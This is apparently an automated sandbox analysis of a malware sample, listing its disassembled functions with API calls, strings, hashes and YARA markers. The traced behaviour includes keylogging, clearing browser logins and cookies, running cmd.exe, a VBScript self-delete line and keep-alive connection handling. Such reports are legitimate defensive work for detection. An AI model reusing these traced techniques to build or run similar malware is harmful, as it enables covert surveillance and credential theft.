                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                                                                                                                • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB6F
                                                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                              • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                                              • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                                                                                                              • API String ID: 368326130-2663660666
                                                                                                                                                                                              • Opcode ID: 258a6fb68fc944e5317241818db4f8e4b5311904cb851d09a550250a4a8b376d
                                                                                                                                                                                              • Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 258a6fb68fc944e5317241818db4f8e4b5311904cb851d09a550250a4a8b376d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99
                                                                                                                                                                                              Function 0040C580 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6B5,00000000,00000000,00000000), ref: 0041B5DE
                                                                                                                                                                                              • ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateExecuteExitFileProcessShell
                                                                                                                                                                                              • String ID: fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                                                                                                                                              • API String ID: 2309964880-3562070623
                                                                                                                                                                                              • Opcode ID: 2f0c58e4ececc8c02d5b25f260c6243bbcd4e4e86e0679598fae02edbeb9a997
                                                                                                                                                                                              • Instruction ID: ace0f40cc0655528612a0b5402a09b3609fe8f046c2334cef27d09c8f481fd79
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f0c58e4ececc8c02d5b25f260c6243bbcd4e4e86e0679598fae02edbeb9a997
                                                                                                                                                                                              • Instruction Fuzzy Hash: D42145315042405AC324FB25E8969BF77E4AFD1318F50453FF482620F2EF38AA49C69A
                                                                                                                                                                                              Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
                                                                                                                                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                                                              • String ID: Offline Keylogger Started
                                                                                                                                                                                              • API String ID: 465354869-4114347211
                                                                                                                                                                                              • Opcode ID: 6c178d591645801289399da5d84ddf8184d34dc30152139e9f78692b17863065
                                                                                                                                                                                              • Instruction ID: 39d66220788a70d2f795ee3c864da876fba87127a7a6d83764b6ce8c19119ba3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c178d591645801289399da5d84ddf8184d34dc30152139e9f78692b17863065
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8011A7B25003097ED220BA36DC87CBF765CDA813A8B40053EF845222D3EA785E54C6FB
                                                                                                                                                                                              Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                                                              • String ID: Online Keylogger Started
                                                                                                                                                                                              • API String ID: 112202259-1258561607
                                                                                                                                                                                              • Opcode ID: 8a51635752a1c61d575209560099017ad37886762b02a6b3bd8adc92d478feb2
                                                                                                                                                                                              • Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a51635752a1c61d575209560099017ad37886762b02a6b3bd8adc92d478feb2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                                                                                                              Function 0044AA83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
                                                                                                                                                                                              • GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0044AB0E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                              • String ID: `@
                                                                                                                                                                                              • API String ID: 2583163307-951712118
                                                                                                                                                                                              • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                                                                              • Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
                                                                                                                                                                                              • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F
                                                                                                                                                                                              Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 00404946
                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create$EventLocalThreadTime
                                                                                                                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                              • API String ID: 2532271599-1507639952
                                                                                                                                                                                              • Opcode ID: f43da267cab2b2a689ce43856c4360b04c2e21f97e645396d0df9ead70b32fdb
                                                                                                                                                                                              • Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
                                                                                                                                                                                              • Opcode Fuzzy Hash: f43da267cab2b2a689ce43856c4360b04c2e21f97e645396d0df9ead70b32fdb
                                                                                                                                                                                              • Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA
                                                                                                                                                                                              Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                                              • String ID: Connection Timeout
                                                                                                                                                                                              • API String ID: 2055531096-499159329
                                                                                                                                                                                              • Opcode ID: 3edb8d7dced932ba54f278ebe09952fcdbe6db201d9c9d38e0d4ca29460b7c95
                                                                                                                                                                                              • Instruction ID: 87453c7fdf87cbb5f51522b6001dca4eac29197b42c1cd59420238f874304a49
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3edb8d7dced932ba54f278ebe09952fcdbe6db201d9c9d38e0d4ca29460b7c95
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F01F5B1900B41AFD325BB3A9C4655ABBE0AB45315700053FF6D396BB1DA38E840CB5A
                                                                                                                                                                                              Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                                                                                                                • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
                                                                                                                                                                                                • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                                              • API String ID: 3628047217-1405518554
                                                                                                                                                                                              • Opcode ID: 40ac6e662a7d765590db31128134f7b1ae0ebe701fd169c5aeeb723224abc78a
                                                                                                                                                                                              • Instruction ID: 10a02b8eb17e148bebaf39200f5874f6183f8458c9cdff10c330f193d408b506
                                                                                                                                                                                              • Opcode Fuzzy Hash: 40ac6e662a7d765590db31128134f7b1ae0ebe701fd169c5aeeb723224abc78a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF0A471400204EAC324FB23D853ACA73649F54748F90497FB446214D2FF3CB618CA8C
                                                                                                                                                                                              Function 004126D2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(004655B0,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCreateValue
                                                                                                                                                                                              • String ID: Control Panel\Desktop
                                                                                                                                                                                              • API String ID: 1818849710-27424756
                                                                                                                                                                                              • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                                                                                                                                                              • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                                                                                                                                                              • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                                                                                                              Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCreateValue
                                                                                                                                                                                              • String ID: TUF
                                                                                                                                                                                              • API String ID: 1818849710-3431404234
                                                                                                                                                                                              • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                                                              • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                                                                                                              Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExecuteShell
                                                                                                                                                                                              • String ID: /C $cmd.exe$open
                                                                                                                                                                                              • API String ID: 587946157-3896048727
                                                                                                                                                                                              • Opcode ID: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                                                                                                                                                              • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                                                                                                              • Opcode Fuzzy Hash: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                                                                                                                                                              • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                                                                                                              Function 0040AFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                              • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                              • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                                                              • String ID: pth_unenc
                                                                                                                                                                                              • API String ID: 3123878439-4028850238
                                                                                                                                                                                              • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                                                                              • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                                                                                                              Function 00401430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                                                                              • String ID: GetCursorInfo$User32.dll
                                                                                                                                                                                              • API String ID: 1646373207-2714051624
                                                                                                                                                                                              • Opcode ID: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                                                                                                                                                              • Instruction ID: 8a619761425f66876362e8ef81435da0b65ff7d8438f08abde0d1abd95200d6c
                                                                                                                                                                                              • Opcode Fuzzy Hash: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                                                                                                                                                              • Instruction Fuzzy Hash: DAB092B458A3059BC7206BE0BD0EA083B64E644703B1000B2F087C1261EB788080DA6E
                                                                                                                                                                                              Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: GetLastInputInfo$User32.dll
                                                                                                                                                                                              • API String ID: 2574300362-1519888992
                                                                                                                                                                                              • Opcode ID: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                                                                                                                                                              • Instruction ID: d4d82ae3f827bcfb7cdfeca7c6c066ea5703a418acbc3ecfb38afa42acb71bdc
                                                                                                                                                                                              • Opcode Fuzzy Hash: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CB092B85843449BC7212BF1BC0DA293AA8FA48B43720447AF406C21A1EB7881809F6F
                                                                                                                                                                                              Function 00448D1B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                                              • Opcode ID: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                                                                                                                                                              • Instruction ID: 44e25d054e292963cfc005d68317528f4d38ac36d82b99eb29904231438c363e
                                                                                                                                                                                              • Opcode Fuzzy Hash: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                                                                                                                                                              • Instruction Fuzzy Hash: C5A14671A042469FFB218F58C8817AFBBA1EF25354F28416FE5859B382CA3C8D45C759
                                                                                                                                                                                              Function 00441A91 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                                                                                                                                                              • Instruction ID: 06af4f468b8ce8c690b0d071e5f1d97fd8a921e774867ed9179d92c0916ed768
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A412971A00744AFE724AF79CC41BAABBE8EB88714F10452FF511DB291E779A9818784
                                                                                                                                                                                              Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3360349984-0
                                                                                                                                                                                              • Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                                                                                                                                                              • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                                                                                                              • Opcode Fuzzy Hash: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                                                                                                                                                              • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                                                                                                              Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                                                                                                              • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                                                                              • API String ID: 3472027048-1236744412
